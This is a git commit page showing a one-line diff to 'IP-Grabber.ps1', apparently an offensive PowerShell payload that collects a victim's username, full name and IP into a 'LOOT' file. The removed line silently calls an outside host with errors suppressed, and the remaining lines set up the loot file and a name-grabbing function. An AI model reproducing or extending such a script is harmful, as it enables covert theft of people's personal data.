Update IP-Grabber.ps1
This commit is contained in:
parent
9980da5f63
commit
3200d1b4d0
1 changed files with 1 additions and 1 deletions
|
@ -1,5 +1,5 @@
|
||||||
$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt"
|
$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt"
|
||||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
|
||||||
#------------------------------------------------------------------------------------------------------------------------------------
|
#------------------------------------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
function Get-fullName {
|
function Get-fullName {
|
||||||
|
|
Loading…
Reference in a new issue